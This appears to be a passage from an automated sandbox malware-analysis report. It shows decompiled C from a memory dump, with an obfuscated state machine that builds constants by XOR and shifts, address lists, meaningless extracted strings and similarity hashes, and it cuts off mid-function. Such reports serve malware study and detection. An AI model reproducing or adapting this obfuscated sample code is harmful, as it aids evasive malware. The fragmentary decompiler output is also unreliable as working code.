				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				unsigned int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t556;
				void* _t560;
				void* _t564;
				short* _t570;
				void* _t577;
				void* _t579;
				void* _t583;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				signed int _t591;
				signed int _t592;
				signed int _t593;
				signed int _t594;
				signed int _t595;
				signed int _t596;
				void* _t597;
				signed int _t660;
				signed int _t661;
				void* _t663;
				void* _t668;
				intOrPtr* _t671;

				_v1584 = _v1584 & 0x00000000;
				_v1624 = 0xcd6a8e;
				_v1624 = _v1624 ^ 0x59f85b52;
				_v1624 = _v1624 ^ 0x5b3531dc;
				_v1780 = 0x153796;
				_v1780 = _v1780 ^ 0xa8923899;
				_v1780 = _v1780 | 0xac28b23c;
				_v1780 = _v1780 >> 0xd;
				_v1780 = _v1780 ^ 0x0003c082;
				_v1632 = 0x568d1d;
				_v1632 = _v1632 << 0xf;
				_v1632 = _v1632 ^ 0x468ec217;
				_v1616 = 0x9d4355;
				_t660 = 0x37;
				_t583 = __ecx;
				_v1616 = _v1616 / _t660;
				_t663 = 0x4a96617;
				_v1616 = _v1616 ^ 0x0000359d;
				_v1724 = 0x93f9c3;
				_v1724 = _v1724 << 2;
				_v1724 = _v1724 | 0x87fdad86;
				_v1724 = _v1724 ^ 0x87f5a7af;
				_v1772 = 0x86acb0;
				_t585 = 0x4f;
				_v1772 = _v1772 / _t585;
				_v1772 = _v1772 | 0x63c36736;
				_t586 = 0x5d;
				_v1772 = _v1772 * 0x4d;
				_v1772 = _v1772 ^ 0x01fd54a9;
				_v1708 = 0x504327;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 | 0x5b079a0f;
				_v1708 = _v1708 ^ 0x5f1f0ea3;
				_v1744 = 0x483dfe;
				_v1744 = _v1744 + 0x7962;
				_v1744 = _v1744 | 0x8f7a93af;
				_v1744 = _v1744 * 0x5e;
				_v1744 = _v1744 ^ 0xaf0ce591;
				_v1604 = 0xf324fc;
				_v1604 = _v1604 / _t586;
				_v1604 = _v1604 ^ 0x000117e7;
				_v1660 = 0x9b0ff3;
				_v1660 = _v1660 + 0xffff7fbd;
				_v1660 = _v1660 ^ 0x00946493;
				_v1768 = 0xe3e80;
				_v1768 = _v1768 + 0xffff3949;
				_v1768 = _v1768 ^ 0xcc667bab;
				_v1768 = _v1768 + 0xd761;
				_v1768 = _v1768 ^ 0xcc67c94c;
				_v1752 = 0x1ba7c7;
				_v1752 = _v1752 << 0xf;
				_v1752 = _v1752 / _t586;
				_v1752 = _v1752 ^ 0x0243af98;
				_v1636 = 0x20ffac;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 ^ 0x041b5824;
				_v1776 = 0x20e7b6;
				_v1776 = _v1776 + 0xdc4;
				_v1776 = _v1776 | 0x16692bc6;
				_v1776 = _v1776 + 0x1ef8;
				_v1776 = _v1776 ^ 0x166ead91;
				_v1588 = 0x5bcce1;
				_v1588 = _v1588 | 0xb1f42707;
				_v1588 = _v1588 ^ 0xb1f41bbe;
				_v1684 = 0x5005f4;
				_v1684 = _v1684 >> 5;
				_v1684 = _v1684 ^ 0x68e867d5;
				_v1684 = _v1684 ^ 0x68ed1d21;
				_v1628 = 0xdd4ed7;
				_v1628 = _v1628 << 0xc;
				_v1628 = _v1628 ^ 0xd4ef0c19;
				_v1800 = 0xcc2fe4;
				_t587 = 0x3d;
				_v1800 = _v1800 * 0x46;
				_v1800 = _v1800 ^ 0xccee4be8;
				_v1800 = _v1800 * 0x49;
				_v1800 = _v1800 ^ 0xa3e0a4c2;
				_v1668 = 0xdcf195;
				_v1668 = _v1668 + 0xffff5a5b;
				_v1668 = _v1668 ^ 0xaadb988a;
				_v1668 = _v1668 ^ 0xaa04b3de;
				_v1592 = 0xdb2eec;
				_v1592 = _v1592 | 0x5f830210;
				_v1592 = _v1592 ^ 0x5fd6e991;
				_v1700 = 0xcdaeb9;
				_v1700 = _v1700 + 0xa9d8;
				_v1700 = _v1700 + 0xb66f;
				_v1700 = _v1700 ^ 0x00c60899;
				_v1796 = 0xd07ac;
				_v1796 = _v1796 << 6;
				_v1796 = _v1796 + 0x6d81;
				_v1796 = _v1796 * 0x18;
				_v1796 = _v1796 ^ 0x4e3f386b;
				_v1612 = 0x56009b;
				_v1612 = _v1612 ^ 0x384c4bff;
				_v1612 = _v1612 ^ 0x381ba556;
				_v1600 = 0xf7e143;
				_v1600 = _v1600 / _t587;
				_v1600 = _v1600 ^ 0x00074027;
				_v1620 = 0xd026e5;
				_v1620 = _v1620 >> 7;
				_v1620 = _v1620 ^ 0x00091c5b;
				_v1640 = 0x4702c1;
				_t588 = 0x52;
				_v1640 = _v1640 / _t588;
				_v1640 = _v1640 ^ 0x0006a1c4;
				_v1648 = 0xc8140a;
				_v1648 = _v1648 + 0xffff0435;
				_v1648 = _v1648 ^ 0x00ca5ae3;
				_v1656 = 0x723f7d;
				_v1656 = _v1656 + 0xba41;
				_v1656 = _v1656 ^ 0x007ca4fd;
				_v1788 = 0x69db09;
				_v1788 = _v1788 + 0xf504;
				_v1788 = _v1788 * 0x65;
				_v1788 = _v1788 | 0x879c6e6e;
				_v1788 = _v1788 ^ 0xafb716ae;
				_v1792 = 0xdee7b0;
				_v1792 = _v1792 | 0x7d73bff1;
				_v1792 = _v1792 << 0xe;
				_v1792 = _v1792 ^ 0xfff81f60;
				_v1692 = 0xc3b6fe;
				_v1692 = _v1692 | 0x6405c425;
				_v1692 = _v1692 >> 0xd;
				_v1692 = _v1692 ^ 0x0005bb30;
				_v1736 = 0x36de01;
				_v1736 = _v1736 + 0x1e5d;
				_t589 = 0x1f;
				_v1736 = _v1736 / _t589;
				_t590 = 5;
				_v1736 = _v1736 / _t590;
				_v1736 = _v1736 ^ 0x00008f60;
				_v1644 = 0x7c75;
				_v1644 = _v1644 + 0x24e8;
				_v1644 = _v1644 ^ 0x000a8631;
				_v1704 = 0x776f2f;
				_v1704 = _v1704 | 0x27015ef2;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0x13ba9814;
				_v1784 = 0x521829;
				_v1784 = _v1784 << 1;
				_v1784 = _v1784 + 0xacbd;
				_v1784 = _v1784 << 6;
				_v1784 = _v1784 ^ 0x293a9c24;
				_v1716 = 0xc7b82c;
				_v1716 = _v1716 + 0xffff8c04;
				_t591 = 0x1b;
				_v1716 = _v1716 / _t591;
				_v1716 = _v1716 ^ 0x000bbd6a;
				_v1760 = 0x5af613;
				_t592 = 0x17;
				_v1760 = _v1760 / _t592;
				_t593 = 0x21;
				_v1760 = _v1760 * 0x79;
				_v1760 = _v1760 / _t593;
				_v1760 = _v1760 ^ 0x0003755a;
				_v1596 = 0x2d708b;
				_v1596 = _v1596 / _t593;
				_v1596 = _v1596 ^ 0x000db37e;
				_v1652 = 0x2eec22;
				_v1652 = _v1652 ^ 0x1f6efaaa;
				_v1652 = _v1652 ^ 0x1f426099;
				_v1676 = 0x1bfaf9;
				_t594 = 0x2c;
				_v1676 = _v1676 / _t594;
				_v1676 = _v1676 + 0x7ed5;
				_v1676 = _v1676 ^ 0x00011204;
				_v1728 = 0x99722;
				_t595 = 0x67;
				_v1728 = _v1728 / _t595;
				_v1728 = _v1728 + 0xa9ed;
				_v1728 = _v1728 ^ 0x000402ee;
				_v1764 = 0x7dadba;
				_v1764 = _v1764 | 0x440aef97;
				_v1764 = _v1764 ^ 0xd3501f2d;
				_v1764 = _v1764 | 0xcb63fec0;
				_v1764 = _v1764 ^ 0xdf6c0598;
				_v1712 = 0xfd5299;
				_v1712 = _v1712 + 0x574d;
				_t596 = 0x68;
				_v1712 = _v1712 / _t596;
				_v1712 = _v1712 ^ 0x000799f4;
				_v1720 = 0xd5633b;
				_v1720 = _v1720 ^ 0xfb7d43ee;
				_v1720 = _v1720 + 0xffff47bd;
				_v1720 = _v1720 ^ 0xfba62c54;
				_v1608 = 0x3d3a3f;
				_v1608 = _v1608 << 0xf;
				_v1608 = _v1608 ^ 0x9d12823b;
				_v1740 = 0x980e3b;
				_v1740 = _v1740 + 0xffff1fe6;
				_v1740 = _v1740 * 0x6e;
				_v1740 = _v1740 << 0xa;
				_v1740 = _v1740 ^ 0xd74f139c;
				_v1748 = 0xf6a327;
				_v1748 = _v1748 | 0x24bb4535;
				_v1748 = _v1748 / _t660;
				_v1748 = _v1748 + 0xffffd901;
				_v1748 = _v1748 ^ 0x00a06448;
				_v1756 = 0x23281c;
				_v1756 = _v1756 << 0xd;
				_v1756 = _v1756 + 0x3ace;
				_v1756 = _v1756 + 0xffffbc66;
				_v1756 = _v1756 ^ 0x6508bae1;
				_v1680 = 0xefa5f3;
				_v1680 = _v1680 + 0xd649;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000b71c0;
				_v1688 = 0xd7d7d;
				_v1688 = _v1688 << 6;
				_v1688 = _v1688 ^ 0x39cce6e9;
				_v1688 = _v1688 ^ 0x3a96b3cf;
				_v1696 = 0xe8190a;
				_v1696 = _v1696 + 0xffff8bcc;
				_v1696 = _v1696 * 0x45;
				_v1696 = _v1696 ^ 0x3e6c45dc;
				_v1732 = 0xaf65ed;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 << 6;
				_v1732 = _v1732 + 0x301f;
				_v1732 = _v1732 ^ 0x15ed60b7;
				_v1664 = 0xbf44dc;
				_v1664 = _v1664 | 0xed1757a9;
				_v1664 = _v1664 ^ 0xd2cd8926;
				_v1664 = _v1664 ^ 0x3f771003;
				_v1672 = 0xa3137e;
				_v1672 = _v1672 | 0x61a4f07f;
				_v1672 = _v1672 << 4;
				_v1672 = _v1672 ^ 0x1a745c42;
				_t661 = _v1584;
				while(1) {
					L1:
					_t556 = 0xd83910a;
					while(1) {
						L2:
						_t597 = 0xecce1ce;
						do {
							L3:
							while(_t663 != 0x2f38181) {
								if(_t663 == 0x396a438) {
									return E00BC9038(_v1732, _v1664, _v1584, _v1672);
								}
								if(_t663 == 0x4a96617) {
									_t663 = 0x971ed5f;
									continue;
								}
								if(_t663 == 0x971ed5f) {
									_t560 = E00BD27E2();
									__eflags = _t560 - E00BB576B();
									_t556 = 0xd83910a;
									_t663 = 0x2f38181;
									_t661 =  !=  ? 0xd83910a : 0xf28d74f;
									L2:
									_t597 = 0xecce1ce;
									continue;
								}
								if(_t663 == 0xa7e2b43) {
									_push(_v1608);
									_push(0);
									_push( &_v1564);
									_push(_v1720);
									_push(_v1712);
									_push(_v1764);
									_push(0);
									_push( &_v1580);
									_t564 = E00BD06EF(_v1728, __eflags);
									__eflags = _t564;
									if(_t564 == 0) {
										L26:
										return _t564;
									}
									E00BC9038(_v1740, _v1748, _v1580, _v1756);
									return E00BC9038(_v1680, _v1688, _v1576, _v1696);
								}
								if(_t663 == 0xd093482) {
									E00BB24AA(_t597, _v1708, __eflags,  &_v1044, _v1744, _v1604, _v1660);
									_t570 = E00BC0F17(_v1768, _v1752,  &_v1044, _v1636, _v1776);
									_t671 = _t668 + 0x1c;
									 *_t570 = 0;
									E00BCCC3F(_v1588,  &_v524, __eflags, _v1684);
									 *_t671 = 0xbb11d0;
									E00BD06A6(__eflags,  &_v1044, _v1668, E00BD0AD3(_v1628, _v1800, __eflags), _v1592, _v1700,  &_v1564, _v1796);
									E00BC2EED(_v1612, _v1600, _v1620, _t572);
									_t577 = E00BD3306( &_v1564, _v1640, _v1648, _v1656, _t583, _v1788);
									_t668 = _t671 + 0x34;
									__eflags = _t577;
									if(__eflags == 0) {
										L12:
										_t663 = 0x396a438;
										while(1) {
											L1:
											_t556 = 0xd83910a;
											goto L2;
										}
									}
									_t556 = 0xd83910a;
									__eflags = _t661 - 0xd83910a;
									_t597 = 0xecce1ce;
									_t663 =  ==  ? 0xecce1ce : 0xa7e2b43;
									continue;
								}
								if(_t663 != _t597) {
									goto L21;
								}
								_push(_t597);
								_t579 = E00BC473A( &_v1580, _v1792, _v1584, _v1692, _v1736,  &_v1564, _v1644, _v1704);
								_t668 = _t668 + 0x20;
								if(_t579 != 0) {
									E00BC9038(_v1784, _v1716, _v1580, _v1760);
									E00BC9038(_v1596, _v1652, _v1576, _v1676);
									_t668 = _t668 + 0x10;
								}
								goto L12;
							}
							__eflags = _t661 - _t556;
							if(_t661 != _t556) {
								_t663 = 0xd093482;
								goto L21;
							}
							_push(_t597);
							_push(_v1772);
							_t564 = E00BB7D87(_v1624, _v1724,  &_v1584, _t597);
							_t668 = _t668 + 0x14;
							__eflags = _t564;
							if(__eflags == 0) {
								goto L26;
							}
							_t663 = 0xd093482;
							goto L1;
							L21:
							__eflags = _t663 - 0xdeb83c1;
						} while (__eflags != 0);
						return _t556;
					}
				}
			}

0x00bb6c04
0x00bb6c0e
0x00bb6c19
0x00bb6c24
0x00bb6c2f
0x00bb6c37
0x00bb6c3f
0x00bb6c47
0x00bb6c4c
0x00bb6c54
0x00bb6c5f
0x00bb6c67
0x00bb6c72
0x00bb6c8a
0x00bb6c8f
0x00bb6c91
0x00bb6c98
0x00bb6c9d
0x00bb6ca8
0x00bb6cb0
0x00bb6cb5
0x00bb6cbd
0x00bb6cc5
0x00bb6cd3
0x00bb6cd8
0x00bb6cdc
0x00bb6ceb
0x00bb6cec
0x00bb6cf0
0x00bb6cf8
0x00bb6d00
0x00bb6d05
0x00bb6d0d
0x00bb6d15
0x00bb6d1d
0x00bb6d25
0x00bb6d32
0x00bb6d36
0x00bb6d3e
0x00bb6d54
0x00bb6d5b
0x00bb6d66
0x00bb6d71
0x00bb6d7c
0x00bb6d87
0x00bb6d8f
0x00bb6d97
0x00bb6d9f
0x00bb6da7
0x00bb6daf
0x00bb6db7
0x00bb6dca
0x00bb6dce
0x00bb6dd6
0x00bb6de1
0x00bb6de9
0x00bb6df4
0x00bb6dfc
0x00bb6e04
0x00bb6e0e
0x00bb6e16
0x00bb6e1e
0x00bb6e29
0x00bb6e34
0x00bb6e3f
0x00bb6e4a
0x00bb6e52
0x00bb6e5d
0x00bb6e68
0x00bb6e73
0x00bb6e7b
0x00bb6e86
0x00bb6e95
0x00bb6e98
0x00bb6e9c
0x00bb6ea9
0x00bb6ead
0x00bb6eb5
0x00bb6ec0
0x00bb6ecb
0x00bb6ed6
0x00bb6ee1
0x00bb6eec
0x00bb6ef7
0x00bb6f02
0x00bb6f0a
0x00bb6f12
0x00bb6f1a
0x00bb6f22
0x00bb6f2a
0x00bb6f2f
0x00bb6f3c
0x00bb6f40
0x00bb6f48
0x00bb6f53
0x00bb6f5e
0x00bb6f69
0x00bb6f7f
0x00bb6f86
0x00bb6f91
0x00bb6f9c
0x00bb6fa4
0x00bb6faf
0x00bb6fc1
0x00bb6fc4
0x00bb6fcb
0x00bb6fd6
0x00bb6fe1
0x00bb6fec
0x00bb6ff7
0x00bb7002
0x00bb700d
0x00bb7018
0x00bb7020
0x00bb702d
0x00bb7031
0x00bb7039
0x00bb7041
0x00bb7049
0x00bb7051
0x00bb7056
0x00bb705e
0x00bb7069
0x00bb7074
0x00bb707c
0x00bb7087
0x00bb708f
0x00bb709f
0x00bb70a4
0x00bb70ae
0x00bb70b3
0x00bb70b7
0x00bb70bf
0x00bb70ca
0x00bb70d5
0x00bb70e0
0x00bb70e8
0x00bb70f0
0x00bb70f4
0x00bb70fc
0x00bb7104
0x00bb7108
0x00bb7110
0x00bb7115
0x00bb711d
0x00bb7125
0x00bb7133
0x00bb7138
0x00bb713c
0x00bb7144
0x00bb7152
0x00bb7157
0x00bb7162
0x00bb7165
0x00bb7171
0x00bb7175
0x00bb717d
0x00bb7193
0x00bb719a
0x00bb71a5
0x00bb71b0
0x00bb71bb
0x00bb71c6
0x00bb71d8
0x00bb71dd
0x00bb71e6
0x00bb71f1
0x00bb71fc
0x00bb7208
0x00bb720b
0x00bb720f
0x00bb7217
0x00bb721f
0x00bb7227
0x00bb722f
0x00bb7237
0x00bb723f
0x00bb7249
0x00bb7256
0x00bb7264
0x00bb7269
0x00bb726d
0x00bb7275
0x00bb727d
0x00bb7285
0x00bb728d
0x00bb7295
0x00bb72a0
0x00bb72a8
0x00bb72b3
0x00bb72bb
0x00bb72c8
0x00bb72cc
0x00bb72d1
0x00bb72d9
0x00bb72e1
0x00bb72ef
0x00bb72f3
0x00bb72fb
0x00bb7303
0x00bb730b
0x00bb7310
0x00bb7318
0x00bb7320
0x00bb7328
0x00bb7333
0x00bb733e
0x00bb7346
0x00bb7351
0x00bb735c
0x00bb7364
0x00bb736f
0x00bb737a
0x00bb7382
0x00bb738f
0x00bb7393
0x00bb739b
0x00bb73a3
0x00bb73a7
0x00bb73ac
0x00bb73b4
0x00bb73bc
0x00bb73c7
0x00bb73d2
0x00bb73dd
0x00bb73e8
0x00bb73f3
0x00bb73fe
0x00bb7406
0x00bb7411
0x00bb7418
0x00bb7418
0x00bb7418
0x00bb741d
0x00bb741d
0x00bb741d
0x00bb7422
0x00000000
0x00bb7422
0x00bb7430
0x00000000
0x00bb772d
0x00bb743c
0x00bb763b
0x00000000
0x00bb763b
0x00bb7448
0x00bb7616
0x00bb7622
0x00bb7629
0x00bb762e
0x00bb7633
0x00bb741d
0x00bb741d
0x00000000
0x00bb741d
0x00bb7454
0x00bb7699
0x00bb76a7
0x00bb76a9
0x00bb76aa
0x00bb76b5
0x00bb76b9
0x00bb76c1
0x00bb76c3
0x00bb76c4
0x00bb76cc
0x00bb76ce
0x00bb7738
0x00bb7738
0x00bb7738
0x00bb76e3
0x00000000
0x00bb7709
0x00bb7460
0x00bb750c
0x00bb752c
0x00bb7531
0x00bb753d
0x00bb754e
0x00bb755e
0x00bb759e
0x00bb75bc
0x00bb75e2
0x00bb75e7
0x00bb75ea
0x00bb75ec
0x00bb74e7
0x00bb74e7
0x00bb7418
0x00bb7418
0x00bb7418
0x00000000
0x00bb7418
0x00bb7418
0x00bb75f2
0x00bb75fc
0x00bb75fe
0x00bb7603
0x00000000
0x00bb7603
0x00bb7468
0x00000000
0x00000000
0x00bb746e
0x00bb749f
0x00bb74a4
0x00bb74a9
0x00bb74be
0x00bb74df
0x00bb74e4
0x00bb74e4
0x00000000
0x00bb74a9
0x00bb7645
0x00bb7647
0x00bb7683
0x00000000
0x00bb7683
0x00bb7649
0x00bb764a
0x00bb7669
0x00bb766e
0x00bb7671
0x00bb7673
0x00000000
0x00000000
0x00bb7679
0x00000000
0x00bb7688
0x00bb7688
0x00bb7688
0x00000000
0x00bb7422
0x00bb741d

Strings

k8?N, xrefs: 00BB6F40
}}, xrefs: 00BB7351
"., xrefs: 00BB71A5
?:=, xrefs: 00BB7295
_q, xrefs: 00BB763B
by, xrefs: 00BB6D1D
MW, xrefs: 00BB7256
_q, xrefs: 00BB7442
'CP, xrefs: 00BB6CF8
C+~, xrefs: 00BB75F7
$, xrefs: 00BB70CA
C+~, xrefs: 00BB744E
/ow, xrefs: 00BB70E0
}?r, xrefs: 00BB6FF7

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ".$'CP$/ow$?:=$C+~$C+~$MW$_q$_q$by$k8?N$}?r$}}$$
API String ID: 0-1854710511
Opcode ID: bc6e4484e00ae4b96e244236a734ac53fea41f744d79884e0e4134513ce3e991
Instruction ID: 0f55f451ec35e9545c2e7c09b469b04290fd1db5042346274e4bec5e9bb62e41
Opcode Fuzzy Hash: bc6e4484e00ae4b96e244236a734ac53fea41f744d79884e0e4134513ce3e991
Instruction Fuzzy Hash: F542FFB150C3818FE778CF65C54AB9BBBE2BBC5314F10891DE29A96260D7B18909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00BC3ABE, Relevance: 17.9, Strings: 14, Instructions: 354
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00BC3ABE() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				unsigned int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				void* _t366;
				signed int _t384;
				void* _t385;
				void* _t413;
				signed int _t422;
				intOrPtr* _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int* _t435;
				void* _t437;

				_t435 =  &_v1720;
				_v1620 = 0x668385;
				_v1620 = _v1620 | 0x1e385418;
				_t385 = 0x69e6be1;
				_v1620 = _v1620 ^ 0x1e7ed7b4;
				_v1592 = 0xbd90f9;
				_v1592 = _v1592 ^ 0xbe5a7d98;
				_v1592 = _v1592 ^ 0xbee8ed5e;
				_v1568 = 0x3d8172;
				_t425 = 0x44;
				_v1568 = _v1568 / _t425;
				_v1568 = _v1568 ^ 0x0000e78e;
				_v1704 = 0x33329f;
				_t426 = 0x78;
				_v1576 = _v1576 & 0x00000000;
				_v1704 = _v1704 * 0x7a;
				_v1704 = _v1704 + 0x19e1;
				_v1704 = _v1704 << 2;
				_v1704 = _v1704 ^ 0x6198e69e;
				_v1700 = 0x4f7879;
				_v1700 = _v1700 ^ 0x068068af;
				_v1700 = _v1700 + 0xffffce8e;
				_v1700 = _v1700 / _t426;
				_v1700 = _v1700 ^ 0x000e8620;
				_v1708 = 0x211c1a;
				_v1708 = _v1708 + 0xf4aa;
				_v1708 = _v1708 ^ 0x94e44756;
				_v1708 = _v1708 << 0x10;
				_v1708 = _v1708 ^ 0x57920010;
				_v1636 = 0x4bfd4e;
				_v1636 = _v1636 + 0xffffda49;
				_v1636 = _v1636 << 0xa;
				_v1636 = _v1636 ^ 0x2f5a0b3c;
				_v1676 = 0xfcfb0f;
				_v1676 = _v1676 << 7;
				_v1676 = _v1676 >> 1;
				_v1676 = _v1676 ^ 0x3f3be9f2;
				_v1716 = 0xe94f3a;
				_v1716 = _v1716 + 0x398d;
				_t427 = 0x21;
				_v1716 = _v1716 / _t427;
				_t428 = 0x3d;
				_v1716 = _v1716 / _t428;
				_v1716 = _v1716 ^ 0x000241fc;
				_v1648 = 0xf37a20;
				_v1648 = _v1648 >> 0xf;
				_v1648 = _v1648 + 0xffff36a3;
				_v1648 = _v1648 ^ 0xfff985b4;
				_v1612 = 0xeb47bb;
				_v1612 = _v1612 >> 0xc;
				_v1612 = _v1612 ^ 0x000d65c2;
				_v1628 = 0xe61d50;
				_v1628 = _v1628 ^ 0xa9fbeeec;
				_v1628 = _v1628 | 0xe3d14da7;
				_v1628 = _v1628 ^ 0xebd6d513;
				_v1564 = 0xf3754;
				_v1564 = _v1564 << 0xd;
				_v1564 = _v1564 ^ 0xe6e10fa0;
				_v1672 = 0xc5ca9d;
				_v1672 = _v1672 + 0xffff8821;
				_v1672 = _v1672 >> 4;
				_v1672 = _v1672 ^ 0x000d1be5;
				_v1680 = 0xd5cdff;
				_v1680 = _v1680 + 0xffff8c76;
				_v1680 = _v1680 ^ 0x1718c905;
				_v1680 = _v1680 ^ 0x17c13aa7;
				_v1652 = 0x8270d6;
				_v1652 = _v1652 ^ 0x5839d95c;
				_v1652 = _v1652 << 0xf;
				_v1652 = _v1652 ^ 0xd4c474fb;
				_v1600 = 0x30b015;
				_v1600 = _v1600 << 9;
				_v1600 = _v1600 ^ 0x616fae71;
				_v1608 = 0xfce334;
				_t429 = 0x72;
				_v1608 = _v1608 / _t429;
				_v1608 = _v1608 ^ 0x000060cb;
				_v1616 = 0x11d4d7;
				_v1616 = _v1616 ^ 0x5fd5780f;
				_v1616 = _v1616 ^ 0x5fc8e652;
				_v1684 = 0xeae186;
				_v1684 = _v1684 + 0x6cbc;
				_v1684 = _v1684 << 9;
				_v1684 = _v1684 ^ 0xd691ca6c;
				_v1656 = 0xc19984;
				_v1656 = _v1656 + 0xed45;
				_v1656 = _v1656 + 0xffffc771;
				_v1656 = _v1656 ^ 0x00ce1f0e;
				_v1664 = 0x536949;
				_v1664 = _v1664 + 0xecba;
				_v1664 = _v1664 + 0xffffade4;
				_v1664 = _v1664 ^ 0x005726c6;
				_v1632 = 0xfb25c3;
				_v1632 = _v1632 ^ 0x0d3ffa7d;
				_v1632 = _v1632 | 0x8d26d07e;
				_v1632 = _v1632 ^ 0x8deecb7d;
				_v1640 = 0x964dcf;
				_v1640 = _v1640 ^ 0x9308e53b;
				_v1640 = _v1640 << 5;
				_v1640 = _v1640 ^ 0x73df8b4b;
				_v1696 = 0x1c5cfe;
				_t430 = 0x58;
				_v1696 = _v1696 / _t430;
				_v1696 = _v1696 << 0xb;
				_v1696 = _v1696 + 0x4083;
				_v1696 = _v1696 ^ 0x029255c4;
				_v1596 = 0x844d79;
				_t431 = 0x13;
				_v1596 = _v1596 / _t431;
				_v1596 = _v1596 ^ 0x000fd2a5;
				_v1712 = 0xaa53e9;
				_v1712 = _v1712 + 0x3fa;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 << 6;
				_v1712 = _v1712 ^ 0xbf135427;
				_v1660 = 0xae69d;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 + 0x7495;
				_v1660 = _v1660 ^ 0x00217c42;
				_v1644 = 0xb4b8b2;
				_t432 = 0x6d;
				_v1644 = _v1644 / _t432;
				_v1644 = _v1644 + 0x9ca2;
				_v1644 = _v1644 ^ 0x000f71e9;
				_v1720 = 0xeb9827;
				_v1720 = _v1720 ^ 0x1e223217;
				_v1720 = _v1720 + 0x18fd;
				_v1720 = _v1720 >> 2;
				_v1720 = _v1720 ^ 0x07b980eb;
				_v1692 = 0x11b265;
				_v1692 = _v1692 + 0xb6a4;
				_v1692 = _v1692 | 0x79b4443a;
				_v1692 = _v1692 >> 5;
				_v1692 = _v1692 ^ 0x03c68786;
				_v1604 = 0x89a26d;
				_v1604 = _v1604 + 0xffffbcd3;
				_v1604 = _v1604 ^ 0x008010cd;
				_v1588 = 0x82ceb0;
				_v1588 = _v1588 ^ 0xda580ff4;
				_v1588 = _v1588 ^ 0xdad52801;
				_v1688 = 0x8fa58e;
				_v1688 = _v1688 + 0xffffbc44;
				_v1688 = _v1688 + 0xcff1;
				_v1688 = _v1688 >> 0xf;
				_v1688 = _v1688 ^ 0x0005e60c;
				_v1572 = 0x2eab26;
				_v1572 = _v1572 | 0x36542239;
				_v1572 = _v1572 ^ 0x36742fed;
				_v1668 = 0x40cdab;
				_v1668 = _v1668 | 0x2a03d9d8;
				_v1668 = _v1668 << 0x10;
				_v1668 = _v1668 ^ 0xddf50159;
				_t434 = _v1576;
				_t384 = _v1576;
				_t422 = _v1576;
				_v1580 = 0x2cbee;
				_v1580 = _v1580 << 6;
				_v1580 = _v1580 ^ 0x00b1d723;
				_v1584 = 0x5c5bfd;
				_v1584 = _v1584 >> 5;
				_v1584 = _v1584 ^ 0x000d5e5b;
				_v1624 = 0x4ce735;
				_v1624 = _v1624 << 0xf;
				_v1624 = _v1624 + 0xffff05be;
				_v1624 = _v1624 ^ 0x7393a0f1;
				while(1) {
					L1:
					_t413 = 0x5c;
					do {
						while(1) {
							L2:
							_t437 = _t385 - 0x94d2245;
							if(_t437 > 0) {
								break;
							}
							if(_t437 == 0) {
								_t424 =  *0xbd5bd8 + 0x30;
								while(1) {
									__eflags =  *_t424 - _t413;
									if( *_t424 == _t413) {
										break;
									}
									_t424 = _t424 + 2;
									__eflags = _t424;
								}
								_t422 = _t424 + 2;
								_t385 = 0x95c790a;
								continue;
							} else {
								if(_t385 == 0x2370cca) {
									_t434 = E00BCE606(_v1696, _t422, _t385, _v1704, _v1596, _v1712, _t385, _v1660, _v1644, _t385, _v1568, _t385, _v1720,  &_v520, _v1692, _v1708, _v1700, _t422, _t384, _t385, _v1604);
									_t435 =  &(_t435[0x13]);
									__eflags = _t434;
									if(_t434 == 0) {
										goto L10;
									} else {
										_t385 = 0xd3e2153;
										_v1576 = 1;
										while(1) {
											L1:
											_t413 = 0x5c;
											goto L2;
										}
									}
								} else {
									if(_t385 == 0x3b57a48) {
										E00BB7CC1(_t384, _v1584, _v1624);
									} else {
										if(_t385 == 0x5337573) {
											E00BB7CC1(_t434, _v1668, _v1580);
											L10:
											_t385 = 0x3b57a48;
											while(1) {
												L1:
												_t413 = 0x5c;
												goto L2;
											}
										} else {
											if(_t385 != 0x69e6be1) {
												goto L25;
											} else {
												_push(_t385);
												E00BBE259(_v1636, _v1620, _v1676, _v1716, _t385, _t385,  &_v1560, _v1648, _v1612);
												_t435 =  &(_t435[8]);
												_t385 = 0xa1bcbfc;
												while(1) {
													L1:
													_t413 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
							L28:
							return _v1576;
						}
						__eflags = _t385 - 0x95c790a;
